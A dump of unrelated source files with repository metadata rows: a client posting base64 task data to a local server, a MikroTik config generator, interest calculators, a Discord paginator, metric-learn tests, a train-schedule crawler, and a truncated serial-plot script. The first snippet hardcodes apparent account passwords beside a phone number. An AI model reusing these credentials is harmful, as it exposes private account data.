task_xqgz={'orgId': 'qfzn', 'boxId': '3001', 'taskList': [{'startDate': '', 'channelType': 3, 'accountId': '', 'updateAcc': '', 'imageUrl': '', 'focusNum': 0, 'endDate': '', 'password': '', 'contentId': 'aaba011b9d9f43c297fd1dd6b5153673', 'id': '1689ffc7f7c14acabb58d1328acf00f6', 'orgId': 'qfzn', 'todayCount': 0, 'ownerAcc': 'qfzn002', 'groupClass': '', 'isDel': 0, 'headUrl': '', 'inputAcc': 'qfzn002', 'text': '哈哈哈', 'limitKey': '', 'updateTime': None, 'nickname': '', 'taskAcc': '13018956681', 'inputTime': {'time': 1556102409000, 'minutes': 40, 'seconds': 9, 'hours': 18, 'month': 3, 'year': 119, 'timezoneOffset': -480, 'day': 3, 'date': 24}, 'isOpen': 0, 'groupKey': '', 'orderKey': '', 'generalizeType': 1}], 'act': 'taskOperate', 'isOperate': 0}
task_login = {"act": "channelLogin","id": "gradfffgWQQdfdfsgvbtdf","orgId": "rd","channelAcc": "13018956681","password": "kaopza743","type": 2,"ownerAcc": "333333"}
task_xqfl={'orgId': 'qfzn', 'boxId': '3000', 'taskList': [{'startDate': '', 'channelType': 3, 'accountId': 'ab96ac5d24eb41babcf38b770d794d31', 'updateAcc': '', 'imageUrl': '', 'focusNum': 0, 'endDate': '', 'password': 'zhy200817436', 'contentId': 'aaba011b9d9f43c297fd1dd6b5153673', 'id': '9b4790bc332940d6997cfec2438a93b3', 'orgId': 'qfzn', 'todayCount': 0, 'ownerAcc': 'qfzn002', 'groupClass': '3063,2003', 'isDel': 0, 'headUrl': '', 'inputAcc': 'qfzn002', 'text': '哈哈哈', 'limitKey': '', 'updateTime': None, 'nickname': '', 'taskAcc': '13018956681', 'inputTime': {'time': 1556158401000, 'minutes': 13, 'seconds': 21, 'hours': 10, 'month': 3, 'year': 119, 'timezoneOffset': -480, 'day': 4, 'date': 25}, 'isOpen': 0, 'groupKey': '', 'orderKey': '', 'generalizeType': 0}], 'act': 'taskOperate', 'isOperate': 0}
url = 'http://192.168.1.168:8866' # 主服务接口
url_1 = URL_CODE_TABLE # 码表接口
task_2=json.dumps(task_xqfl)
res = task_2.encode('utf-8')
# res = bytes('{}'.format(task_2), 'utf-8')
res = base64.b64encode(res)
b = requests.post(url=url, data=res).text
b = base64.b64decode(b)
b = b.decode('utf-8', errors='ignore')
print(b)
| [
"1260132105@qq.com"
] | 1260132105@qq.com |
045807bd2d431357637794e312e8b28745f0fb7d | 964e658a34ddc88625897df950ed904b36815888 | /mk_conf.py | 6ef0dae7f69fef268d06eb1dccd238d0d148bc67 | [] | no_license | pashorg/MikroTik_config | 4739e2b8b4fe2380ca43824980c39383ecb857c8 | f17cf6fb20c431bae6c3d092cb47ade1ea0c1691 | refs/heads/master | 2021-01-23T04:40:03.786419 | 2017-03-26T13:38:19 | 2017-03-26T13:38:19 | 86,234,878 | 0 | 0 | null | 2017-03-26T13:35:40 | 2017-03-26T13:32:48 | null | UTF-8 | Python | false | false | 1,572 | py | # -*- coding: utf-8 -*-
import json #Used to parse json files
from optparse import OptionParser #Used to parse input arguments
import conf_maker #Class file
#Input arguments configuration and parser
parser = OptionParser()
parser.add_option('-m', '--main-json', dest='main_json_file', help='Main json file name', metavar='FILE', default=0)
parser.add_option('-s', '--serv-json', dest='service_json_file', help='Tarification json file name', metavar='FILE', default=0)
parser.add_option('-o', '--out-file', dest='output_file', help='Output file name', metavar='FILE', default=0)
(options, args) = parser.parse_args()
#Open json files. If no file set - raise error
if options.main_json_file:
data_import_file = open(options.main_json_file, 'r')
data = json.load(data_import_file)
else: raise RuntimeError('Main json file required')
if options.service_json_file:
service_import_file = open(options.service_json_file, 'r')
service_data = json.load(service_import_file)
else: raise RuntimeError('Tarification json file required')
#Set output file if one was specified
data_export_file = ''
if options.output_file: data_export_file = open(options.output_file,'w') #open output file if needed
#Load class
config_maker = conf_maker.conf_maker(data['report'], service_data['report'])
full_conf = config_maker.get_all()
#Print to output file if one is set
if options.output_file:
for command in full_conf: data_export_file.write(command)
#Print to command line otherwise
else:
for command in full_conf: print command | [
"noreply@github.com"
] | pashorg.noreply@github.com |
ade9d719d5e6caff26a5f19e50b6052ec56573fd | d40e5a973d7dd6c5f346f4e1cc531572e868175f | /src/models.py | 270e35bd0fe7119a21fd792f0037ed5bde14dc49 | [
"MIT"
] | permissive | AndyXIN/farm-calc | 3f7abc8f160d8aa03ff8604ff41313ad66a8ff4b | b1769232d4577fde408ee43f7197299e61425dca | refs/heads/main | 2023-07-07T03:56:23.967627 | 2021-08-10T04:31:28 | 2021-08-10T04:31:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,834 | py | from typing import Callable, Dict, List
class Interest:
"""
Interest includes:
- Capital invested
- Annual Percentage Rate (APR)
- Daily interest from APR
"""
def __init__(self, capital: float, apr: float) -> None:
self.cap = capital
self.apr = apr / 100
self.daily = self.apr / 365
class Simple(Interest):
"""
Simple interest includes:
- Additional Monthly and Hourly interests from APR
- Income for each period of time (year, month, day, hour)
"""
def __init__(self, capital: float, apr: float) -> None:
Interest.__init__(self, capital, apr)
self.monthly: float = self.daily * 30
self.hourly: float = self.daily / 24
self.annual_income: float = self.cap * self.apr
self.monthly_income: float = self.cap * self.monthly
self.daily_income: float = self.cap * self.daily
self.hourly_income: float = self.cap * self.hourly
class Compound(Interest):
"""
Compound interest includes:
- List of possible Periods for a given number of days and their performance.
- Top 3 Periods with the best performance and the recomended one.
- Explanation of relevant indicators (dif)
"""
def __init__(self, cap: float, apr: float, gas: float, days: int) -> None:
Interest.__init__(self, cap, apr)
self.periods: List[Period] = []
self.best: List[Period] = []
self.recom: Period
self._calc_periods(gas, days)
def _comp_cycles(self, cap: float, days: int) -> None:
# Do Compund every x number of days
for x in range(1, days - 1):
if days % x == 0:
pd = Period(cap=cap, days=int(days / x), cycles=x)
self.periods.append(pd)
def _calc_periods(self, gas: float, days: int):
# INTERES COMPUESTO A LOS N DIAS
simple_int: float = days * self.daily
self._comp_cycles(self.cap, days)
# Diferencia entre valor actual y anterior para: roi y gas
prev_profit: float = 0
prev_gas: float = 0
for pd in self.periods:
pd.set_gas(gas)
pd.set_interest(simple_int / pd.cycles)
if prev_profit != 0:
pd.dif_profit = pd.profit - prev_profit
pd.dif_gas = pd.spent_gas - prev_gas
else:
pd.dif_profit = prev_profit
pd.dif_gas = prev_gas
prev_profit = pd.profit
prev_gas = pd.spent_gas
# Filtramos, descartando las pérdidas
cond: Callable[[Period], bool] = lambda p: p.dif_profit > p.dif_gas
self.best = list(filter(cond, self.periods))
# Mostramos las frecuencias con mayor ganancia
if len(self.best) > 0:
self.best = self.best[-3:]
self.recom = max(self.best, key=lambda x: x.days)
class Period:
"""
Time Period of the Compound interest.
It includes:
- Frequency days to execute a cycle (making the compound)
- Spent gas fee, Profit, ROI and
- Difference between last and new compound cycle performance (profit and spent gas).
"""
def __init__(self, cap: float, days: int, cycles: int):
self.cap = cap
self.days = days
self.cycles = cycles
self.spent_gas: float
self._yield: float
self.profit: float
self.roi: float
self.dif_profit: float
self.dif_gas: float
def set_gas(self, gas: float) -> None:
self.spent_gas = self.cycles * gas
def set_interest(self, interest: float) -> None:
self._yield = (self.cap * (1 + interest) ** self.cycles) - self.cap
self.profit = self._yield - self.spent_gas
self.roi = (self.profit / self.cap) * 100
if __name__ == "__main__":
print("This is not main!")
| [
"g298luis@gmail.com"
] | g298luis@gmail.com |
da446623dd165e79d5deb3c0f0acefeb406914f2 | cceaf304f65a46bf4725b7dc8d0de2b3584d763d | /utils/pagination.py | f4262661c19c278deef6ecf1a4b9cf65450956db | [
"MIT"
] | permissive | davisschenk/Unnamed-Bot | 7b7c8670300e1a55c0c335a559812fc1f666015b | 8e05d5a79dfab768574efd4e9061e2d7b22ae9e5 | refs/heads/master | 2022-06-04T11:42:51.391474 | 2020-05-01T05:33:48 | 2020-05-01T05:33:48 | 194,289,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,936 | py | # Code from https://github.com/Rapptz/RoboDanny/blob/rewrite/cogs/utils/paginator.py
# Used under MIT licence
import asyncio
import discord
from discord.ext.commands import Paginator as CommandPaginator
from utils.embeds import CustomEmbeds
import data.custom_emotes as emotes
class CannotPaginate(Exception):
pass
class Pages:
"""Implements a paginator that queries the user for the
pagination interface.
Pages are 1-index based, not 0-index based.
If the user does not reply within 2 minutes then the pagination
interface exits automatically.
Parameters
------------
ctx: Context
The context of the command.
entries: List[str]
A list of entries to paginate.
per_page: int
How many entries show up per page.
show_entry_count: bool
Whether to show an entry count in the footer.
Attributes
-----------
embed: discord.Embed
The embed object that is being used to send pagination info.
Feel free to modify this externally. Only the description,
footer fields, and colour are internally modified.
permissions: discord.Permissions
Our permissions for the channel.
"""
def __init__(self, ctx, *, entries, per_page=12, show_entry_count=True, **kwargs):
self.bot = ctx.bot
self.entries = entries
self.message = ctx.message
self.channel = ctx.channel
self.author = ctx.author
self.per_page = per_page
pages, left_over = divmod(len(self.entries), self.per_page)
if left_over:
pages += 1
self.maximum_pages = pages
self.embed = CustomEmbeds.info(**kwargs)
self.paginating = len(entries) > per_page
self.show_entry_count = show_entry_count
self.reaction_emojis = [
(emotes.skip_backwards, self.first_page),
(emotes.backwards, self.previous_page),
(emotes.forwards, self.next_page),
(emotes.skip_forwards, self.last_page),
(emotes.pound_sign, self.numbered_page),
(emotes.stop, self.stop_pages),
(emotes.info, self.show_help),
]
if ctx.guild is not None:
self.permissions = self.channel.permissions_for(ctx.guild.me)
else:
self.permissions = self.channel.permissions_for(ctx.bot.user)
if not self.permissions.embed_links:
raise CannotPaginate('Bot does not have embed links permission.')
if not self.permissions.send_messages:
raise CannotPaginate('Bot cannot send messages.')
if self.paginating:
# verify we can actually use the pagination session
if not self.permissions.add_reactions:
raise CannotPaginate('Bot does not have add reactions permission.')
if not self.permissions.read_message_history:
raise CannotPaginate('Bot does not have Read Message History permission.')
def get_page(self, page):
base = (page - 1) * self.per_page
return self.entries[base:base + self.per_page]
def get_content(self, entries, page, *, first=False):
return None
def get_embed(self, entries, page, *, first=False):
self.prepare_embed(entries, page, first=first)
return self.embed
def prepare_embed(self, entries, page, *, first=False):
p = []
for index, entry in enumerate(entries, 1 + ((page - 1) * self.per_page)):
p.append(f'{index}. {entry}')
if self.maximum_pages > 1:
if self.show_entry_count:
text = f'Page {page}/{self.maximum_pages} ({len(self.entries)} entries)'
else:
text = f'Page {page}/{self.maximum_pages}'
self.embed.set_footer(text=text)
if self.paginating and first:
p.append('')
p.append(f'Confused? React with {emotes.info} for more info.')
self.embed.description = '\n'.join(p)
async def show_page(self, page, *, first=False):
self.current_page = page
entries = self.get_page(page)
content = self.get_content(entries, page, first=first)
embed = self.get_embed(entries, page, first=first)
if not self.paginating:
return await self.channel.send(content=content, embed=embed)
if not first:
await self.message.edit(content=content, embed=embed)
return
self.message = await self.channel.send(content=content, embed=embed)
for (reaction, _) in self.reaction_emojis:
if self.maximum_pages == 2 and reaction in (emotes.skip_forwards, emotes.skip_backwards):
# no |<< or >>| buttons if we only have two pages
# we can't forbid it if someone ends up using it but remove
# it from the default set
continue
await self.message.add_reaction(reaction)
async def checked_show_page(self, page):
if page != 0 and page <= self.maximum_pages:
await self.show_page(page)
async def first_page(self):
"""goes to the first page"""
await self.show_page(1)
async def last_page(self):
"""goes to the last page"""
await self.show_page(self.maximum_pages)
async def next_page(self):
"""goes to the next page"""
await self.checked_show_page(self.current_page + 1)
async def previous_page(self):
"""goes to the previous page"""
await self.checked_show_page(self.current_page - 1)
async def show_current_page(self):
if self.paginating:
await self.show_page(self.current_page)
async def numbered_page(self):
"""lets you type a page number to go to"""
to_delete = []
to_delete.append(await self.channel.send('What page do you want to go to?'))
def message_check(m):
return m.author == self.author and \
self.channel == m.channel and \
m.content.isdigit()
try:
msg = await self.bot.wait_for('message', check=message_check, timeout=30.0)
except asyncio.TimeoutError:
to_delete.append(await self.channel.send('Took too long.'))
await asyncio.sleep(5)
else:
page = int(msg.content)
to_delete.append(msg)
if page != 0 and page <= self.maximum_pages:
await self.show_page(page)
else:
to_delete.append(await self.channel.send(f'Invalid page given. ({page}/{self.maximum_pages})'))
await asyncio.sleep(5)
try:
await self.channel.delete_messages(to_delete)
except Exception:
pass
async def show_help(self):
"""shows this message"""
messages = ['Welcome to the interactive paginator!\n']
messages.append('This interactively allows you to see pages of text by navigating with ' \
'reactions. They are as follows:\n')
for (emoji, func) in self.reaction_emojis:
messages.append(f'{emoji} {func.__doc__}')
embed = self.embed.copy()
embed.clear_fields()
embed.description = '\n'.join(messages)
embed.set_footer(text=f'We were on page {self.current_page} before this message.')
await self.message.edit(content=None, embed=embed)
async def go_back_to_current_page():
await asyncio.sleep(60.0)
await self.show_current_page()
self.bot.loop.create_task(go_back_to_current_page())
async def stop_pages(self):
"""stops the interactive pagination session"""
await self.message.delete()
self.paginating = False
def react_check(self, reaction, user):
if user is None or user.id != self.author.id:
return False
if reaction.message.id != self.message.id:
return False
for (emoji, func) in self.reaction_emojis:
if str(reaction.emoji) == str(emoji) or reaction.emoji == emoji:
self.match = func
return True
return False
async def paginate(self):
"""Actually paginate the entries and run the interactive loop if necessary."""
first_page = self.show_page(1, first=True)
if not self.paginating:
await first_page
else:
# allow us to react to reactions right away if we're paginating
self.bot.loop.create_task(first_page)
while self.paginating:
try:
reaction, user = await self.bot.wait_for('reaction_add', check=self.react_check, timeout=120.0)
except asyncio.TimeoutError:
self.paginating = False
try:
await self.message.clear_reactions()
except:
pass
finally:
break
try:
await self.message.remove_reaction(reaction, user)
except:
pass # can't remove it so don't bother doing so
await self.match()
class FieldPages(Pages):
"""Similar to Pages except entries should be a list of
tuples having (key, value) to show as embed fields instead.
"""
def prepare_embed(self, entries, page, *, first=False):
self.embed.clear_fields()
self.embed.description = discord.Embed.Empty
for key, value in entries:
self.embed.add_field(name=key, value=value, inline=False)
if self.maximum_pages > 1:
if self.show_entry_count:
text = f'Page {page}/{self.maximum_pages} ({len(self.entries)} entries)'
else:
text = f'Page {page}/{self.maximum_pages}'
self.embed.set_footer(text=text)
class TextPages(Pages):
"""Uses a commands.Paginator internally to paginate some text."""
def __init__(self, ctx, text, *, prefix='```', suffix='```', max_size=2000):
paginator = CommandPaginator(prefix=prefix, suffix=suffix, max_size=max_size - 200)
for line in text.split('\n'):
paginator.add_line(line)
super().__init__(ctx, entries=paginator.pages, per_page=1, show_entry_count=False)
def get_page(self, page):
return self.entries[page - 1]
def get_embed(self, entries, page, *, first=False):
return None
def get_content(self, entry, page, *, first=False):
if self.maximum_pages > 1:
return f'{entry}\nPage {page}/{self.maximum_pages}'
return entry
class UrbanDictionaryPages(Pages):
def __init__(self, ctx, *, entries, **kwargs):
super().__init__(ctx, entries=entries, **kwargs)
self.embed = CustomEmbeds.info(author="Urban Dictionary")
def prepare_embed(self, entries, page, *, first=False):
self.embed.clear_fields()
self.embed.description = discord.Embed.Empty
desc = ""
for definition in entries:
description = definition.get('definition').replace("[", "").replace("]", "")
example = definition.get('example').replace("[", "").replace("]", "")
link = definition.get('permalink')
author = definition.get('author')
word = definition.get('word')
desc += f"Word: {word}\n" \
f"**Description**\n" \
f"{description}\n" \
f"**Example**\n" \
f"{example}\n\n" \
f"[Link]({link}) | Author: {author}"
if self.maximum_pages > 1:
if self.show_entry_count:
text = f'Page {page}/{self.maximum_pages} ({len(self.entries)} entries)'
else:
text = f'Page {page}/{self.maximum_pages}'
self.embed.set_footer(text=text)
self.embed.description = desc
| [
"35881002+davisschenk@users.noreply.github.com"
] | 35881002+davisschenk@users.noreply.github.com |
c7c1e7bf9869fee16a3ec40957e9ff0cd0d56ddd | 34b4c572fe47e36878d9866ce0335f6f9e01c8e9 | /test/test_mahalanobis_mixin.py | 0d834f10915c65c946683f6f070c4172cf084ee9 | [
"MIT"
] | permissive | raijinspecial/metric-learn | 1bc7511b94ae3f4fef43d8de8ab2e95e061bd2d8 | 8ffd998971b70ba9b4f1b06ae9b9ef47d4c27f45 | refs/heads/master | 2020-04-17T20:40:42.593589 | 2019-01-07T18:34:06 | 2019-01-07T18:34:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,627 | py | from itertools import product
import pytest
import numpy as np
from numpy.testing import assert_array_almost_equal
from scipy.spatial.distance import pdist, squareform
from sklearn import clone
from sklearn.utils import check_random_state
from sklearn.utils.testing import set_random_state
from metric_learn._util import make_context
from test.test_utils import ids_metric_learners, metric_learners
RNG = check_random_state(0)
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_score_pairs_pairwise(estimator, build_dataset):
# Computing pairwise scores should return a euclidean distance matrix.
input_data, labels, _, X = build_dataset()
n_samples = 20
X = X[:n_samples]
model = clone(estimator)
set_random_state(model)
model.fit(input_data, labels)
pairwise = model.score_pairs(np.array(list(product(X, X))))\
.reshape(n_samples, n_samples)
check_is_distance_matrix(pairwise)
# a necessary condition for euclidean distance matrices: (see
# https://en.wikipedia.org/wiki/Euclidean_distance_matrix)
assert np.linalg.matrix_rank(pairwise**2) <= min(X.shape) + 2
# assert that this distance is coherent with pdist on embeddings
assert_array_almost_equal(squareform(pairwise), pdist(model.transform(X)))
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_score_pairs_toy_example(estimator, build_dataset):
# Checks that score_pairs works on a toy example
input_data, labels, _, X = build_dataset()
n_samples = 20
X = X[:n_samples]
model = clone(estimator)
set_random_state(model)
model.fit(input_data, labels)
pairs = np.stack([X[:10], X[10:20]], axis=1)
embedded_pairs = pairs.dot(model.transformer_.T)
distances = np.sqrt(np.sum((embedded_pairs[:, 1] -
embedded_pairs[:, 0])**2,
axis=-1))
assert_array_almost_equal(model.score_pairs(pairs), distances)
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_score_pairs_finite(estimator, build_dataset):
# tests that the score is finite
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
model.fit(input_data, labels)
pairs = np.array(list(product(X, X)))
assert np.isfinite(model.score_pairs(pairs)).all()
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_score_pairs_dim(estimator, build_dataset):
# scoring of 3D arrays should return 1D array (several tuples),
# and scoring of 2D arrays (one tuple) should return an error (like
# scikit-learn's error when scoring 1D arrays)
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
model.fit(input_data, labels)
tuples = np.array(list(product(X, X)))
assert model.score_pairs(tuples).shape == (tuples.shape[0],)
context = make_context(estimator)
msg = ("3D array of formed tuples expected{}. Found 2D array "
"instead:\ninput={}. Reshape your data and/or use a preprocessor.\n"
.format(context, tuples[1]))
with pytest.raises(ValueError) as raised_error:
model.score_pairs(tuples[1])
assert str(raised_error.value) == msg
def check_is_distance_matrix(pairwise):
assert (pairwise >= 0).all() # positivity
assert np.array_equal(pairwise, pairwise.T) # symmetry
assert (pairwise.diagonal() == 0).all() # identity
# triangular inequality
tol = 1e-15
assert (pairwise <= pairwise[:, :, np.newaxis] +
pairwise[:, np.newaxis, :] + tol).all()
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_embed_toy_example(estimator, build_dataset):
# Checks that embed works on a toy example
input_data, labels, _, X = build_dataset()
n_samples = 20
X = X[:n_samples]
model = clone(estimator)
set_random_state(model)
model.fit(input_data, labels)
embedded_points = X.dot(model.transformer_.T)
assert_array_almost_equal(model.transform(X), embedded_points)
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_embed_dim(estimator, build_dataset):
# Checks that the the dimension of the output space is as expected
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
model.fit(input_data, labels)
assert model.transform(X).shape == X.shape
# assert that ValueError is thrown if input shape is 1D
context = make_context(estimator)
err_msg = ("2D array of formed points expected{}. Found 1D array "
"instead:\ninput={}. Reshape your data and/or use a "
"preprocessor.\n".format(context, X[0]))
with pytest.raises(ValueError) as raised_error:
model.score_pairs(model.transform(X[0, :]))
assert str(raised_error.value) == err_msg
# we test that the shape is also OK when doing dimensionality reduction
if type(model).__name__ in {'LFDA', 'MLKR', 'NCA', 'RCA'}:
model.set_params(num_dims=2)
model.fit(input_data, labels)
assert model.transform(X).shape == (X.shape[0], 2)
# assert that ValueError is thrown if input shape is 1D
with pytest.raises(ValueError) as raised_error:
model.transform(model.transform(X[0, :]))
assert str(raised_error.value) == err_msg
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_embed_finite(estimator, build_dataset):
# Checks that embed returns vectors with finite values
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
model.fit(input_data, labels)
assert np.isfinite(model.transform(X)).all()
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_embed_is_linear(estimator, build_dataset):
# Checks that the embedding is linear
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
model.fit(input_data, labels)
assert_array_almost_equal(model.transform(X[:10] + X[10:20]),
model.transform(X[:10]) +
model.transform(X[10:20]))
assert_array_almost_equal(model.transform(5 * X[:10]),
5 * model.transform(X[:10]))
| [
"bellet@users.noreply.github.com"
] | bellet@users.noreply.github.com |
7b42a2c6fe549de4ee270432a55bc805f6b33c8c | 6bbd5996efd7f3e4b96c6158bea5552331a06741 | /train_crawler.py | f1a6f6b0eff92e0b5cbe211206047580529a4359 | [] | no_license | rainbowday/Train-Crawler | ef7365577f9bfc4ee816484abaf2dd7ce712fb58 | 2d4b8efb4c937a3ffc7bef20e4ae092875a0529a | refs/heads/master | 2020-07-04T11:16:00.983215 | 2018-07-01T14:51:08 | 2018-07-01T14:51:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,866 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/6/29 0029 18:08
# @Author : KangQiang
# @File : Crawler.py
# @Software: PyCharm
import json
import threading
import time
from queue import Queue
from config import UN_PROCESSED, PROCESSING, PROCESSED, logger, train_tasks_status_db, train_result_filename, format_url,ip_interval
from pymongo import UpdateOne
from get_page import get_page,get_count
task_queue = Queue()
response_queue = Queue()
def parse(html_response):
'''
将 get_page 得到的 response.text 解析,得到其中有用的数据
:param html_response:
:return: list。始发站到终点站所有车次信息。
[['5l0000D35273', 'D352', 'AOH', 'ICW', 'AOH', 'ICW', '06:11', '20:27', '14:16', 'Y'], ['5l0000D63640', 'D636', 'AOH', 'ICW', 'AOH', 'ICW', '06:33', '21:01', '14:28', 'Y']]
'''
time_detail = []
data = json.loads(html_response)["data"]
result = data["result"]
try:
for train in result:
temp_list = train[train.index("|") + 1:].split("|")
time_detail.append(temp_list[1:11])
except Exception as e:
logger.critical(str(e) + str(result))
return None
return time_detail
def construct_url(url_paras):
'''
根据url_paras构造页面网址
:param url_paras: 字符串。以'-'分割不同参数
:return: 网址。需要注意的是,网址中有train_date参数。train_date:选择程序运行时刻的后5天。
'''
return format_url.format(from_station=url_paras.split("-")[0], to_station=url_paras.split("-")[1])
class Crawler(threading.Thread):
'''
数据抓取类
'''
def __init__(self, task_status_db, parse_fun, construct_url_fun):
'''
:param collection: 数据库。任务相关数据库,记录了任务抓取状态。以url_para作为primary key
:param parse_fun: 函数。解析response.text,返回有用数据。
:param task_url_fun: 函数。利用task_queue中的数据,得到task_url。
'''
super(Crawler, self).__init__()
self.collection = task_status_db
self.parse = parse_fun
self.construct_url = construct_url_fun
def run(self):
global task_queue
global response_queue
while True:
url_paras = task_queue.get()
task_url = self.construct_url(url_paras)
try:
# 这里的 requests需要包装起来
response = get_page(task_url)
if response:
data = self.parse(response)
if data is not None: # 如果为None,表明解析response.text出现错误。
response_queue.put((data, url_paras))
else:
self.collection.update_one({'_id': url_paras}, update={'$set': {'status': UN_PROCESSED}})
else:
# 把数据库中的 status重新置为 UN_PROCESSED
self.collection.update_one({'_id': url_paras}, update={'$set': {'status': UN_PROCESSED}})
except Exception as e:
logger.critical('In Crawler:{}'.format(str(e)) + str(task_url))
self.collection.update_one({'_id': url_paras}, update={'$set': {'status': UN_PROCESSED}})
pass
class TaskProducer(threading.Thread):
def __init__(self, task_status_db):
super(TaskProducer, self).__init__()
self.collection = task_status_db
def run(self):
global task_queue
while True:
try:
if task_queue.qsize() < 300:
temp = self.collection.find({'status': UN_PROCESSED}, limit=60)
for single_item in temp:
# 设置为PROCESSING
self.collection.update_one({'_id': single_item['_id']},
update={'$set': {'status': PROCESSING}})
task_queue.put(single_item['_id'])
else:
time.sleep(3)
except Exception as e:
logger.critical('In Task1Producer:{}'.format(str(e)))
pass
class DataSaver3(threading.Thread):
def __init__(self, task_status_db, file_name):
'''
:param task_status_db: 记录任务状态的数据库。数据直接存入,task_status_db中
:param file_name: 数据存储的文件名。
'''
super(DataSaver3, self).__init__()
self.status_db = task_status_db # 既是存储任务状态的数据库,也是存储数据的地方。
self.file_name = file_name
def save2db(self, size):
'''
:param size: response_size
:return:
'''
global response_queue
ops = [] # users_info需要执行的运算操作
try:
for _ in range(size):
data, url_paras = response_queue.get() # 一个界面的response
ops.append(
UpdateOne({'_id': url_paras}, update={'$set': {'status': PROCESSED, 'data': data}}))
# self.status_db.update_one({'_id': recordId}, {'$set': {'status': PROCESSED, 'data': data}})
if ops:
self.status_db.bulk_write(ops, ordered=False)
except Exception as e:
if 'batch op errors occurred' not in str(e):
logger.error('In save2db:' + str(e))
pass
def save2file(self, size):
'''
将size大小的response解析之后存入本地文件
:param size: response_size
:return:
'''
global response_queue
with open(self.file_name, 'a', encoding="utf-8") as f:
for _ in range(size):
try:
data, url_para = response_queue.get()
self.status_db.find_one_and_update({'_id': url_para},
{'$set': {'status': PROCESSED}}) # 将相应的uid置为PROCESSED
f.write(json.dumps({"_id": url_para, "data": data}) + '\n')
except Exception as e:
logger.error('In save2file:' + str(e))
pass
def run(self):
while True:
self.save2db(30)
# self.save2file(200)
class Supervisor(threading.Thread):
def __init__(self, tasks_status_db):
super(Supervisor, self).__init__()
self.tasks_status_db = tasks_status_db
def run(self):
global response_queue
while True:
pre_count = get_count()
time.sleep(10)
now_count = get_count()
logger.info('page_count:{now_count} speed:{speed} response_queue.qsize():{size}'.format(now_count=now_count,
speed=(
now_count - pre_count) / 10,
size=response_queue.qsize()))
print("PROCESSED: " + str(self.tasks_status_db.find({"status": PROCESSED}).count()))
print("PROCESSING: " + str(self.tasks_status_db.find({"status": PROCESSING}).count()))
print("UN_PROCESSED: " + str(self.tasks_status_db.find({"status": UN_PROCESSED}).count()))
if __name__ == '__main__':
t = TaskProducer(train_tasks_status_db)
t.start()
t = DataSaver3(train_tasks_status_db, train_result_filename)
t.start()
for i in range(2):
t = Crawler(train_tasks_status_db, parse, construct_url)
t.start()
# t = IpChanger()
# t.start()
t = Supervisor(train_tasks_status_db)
t.start()
| [
"tkanng@gmail.com"
] | tkanng@gmail.com |
aaa99663a9b9a7da2458aa4b46a53fef0d1a4366 | e6a81db4f217840a42bdf968b3b2972ed1ade4d2 | /hello.txrx.44.py | b33c8f8c72eb9c42f183e85376886a6761bbf19e | [] | no_license | Satyam/rotationsensor | e2e37201d920337863ce87708ea992bb705943b4 | 5056c5cc83c953c2b0e476f6c4f46e57e29f60ad | refs/heads/master | 2021-06-01T15:03:53.266583 | 2021-03-09T15:51:45 | 2021-03-09T15:51:45 | 19,355,877 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,615 | py | #
# hello.txrx.44.py
#
# receive and display transmit-receive step response
# hello.step.44.py serial_port
#
# Neil Gershenfeld
# CBA MIT 11/6/11
#
# (c) Massachusetts Institute of Technology 2011
# Permission granted for experimental and personal use;
# license for commercial sale available from MIT
#
from Tkinter import *
import serial
WINDOW = 600 # window size
eps = 0.75 # filter fraction
filt = 0.0 # filtered value
padnumber = 0
def idle(parent,canvas):
global filt, eps
#
# idle routine
#
byte2 = 0
byte3 = 0
byte4 = 0
ser.flush()
#
# find framing
#
while 1:
byte1 = byte2
byte2 = byte3
byte3 = byte4
byte4 = ord(ser.read())
if ((byte1 == 1) & (byte2 == 2) & (byte3 == 3) & (byte4 == 4)):
break
#
# read and plot
#
padnumber = int(ord(ser.read())) - 1
#print "-----------"
#print "padnumber: %d"%padnumber
up_low = ord(ser.read())
#print "up_low: %d"%up_low
up_high = ord(ser.read())
#print "up_high: %d"%up_high
down_low = ord(ser.read())
#print "down_low: %d"%down_low
down_high = ord(ser.read())
#print "down_high: %d"%down_high
up_value = 256*up_high + up_low
down_value = 256*down_high + down_low
value = (up_value - down_value)
filt = (1-eps)*filt + eps*value
x = int(.2*WINDOW + (.9-.2)*WINDOW*filt/10000.0)
print padnumber, value
if(padnumber == 0):
canvas.itemconfigure("pad1text",text="%.1f"%filt)
canvas.coords('pad1fillrect',.2*WINDOW,.05*WINDOW+.25*WINDOW*padnumber,x,.2*WINDOW+.25*WINDOW*padnumber)
canvas.coords('pad1emptyrect',x,.05*WINDOW+.25*WINDOW*padnumber,.9*WINDOW,.2*WINDOW+.25*WINDOW*padnumber)
elif (padnumber == 1):
canvas.itemconfigure("pad2text",text="%.1f"%filt)
canvas.coords('pad2fillrect',.2*WINDOW,.05*WINDOW+.25*WINDOW*padnumber,x,.2*WINDOW+.25*WINDOW*padnumber)
canvas.coords('pad2emptyrect',x,.05*WINDOW+.25*WINDOW*padnumber,.9*WINDOW,.2*WINDOW+.25*WINDOW*padnumber)
elif (padnumber == 2):
canvas.itemconfigure("pad3text",text="%.1f"%filt)
canvas.coords('pad3fillrect',.2*WINDOW,.05*WINDOW+.25*WINDOW*padnumber,x,.2*WINDOW+.25*WINDOW*padnumber)
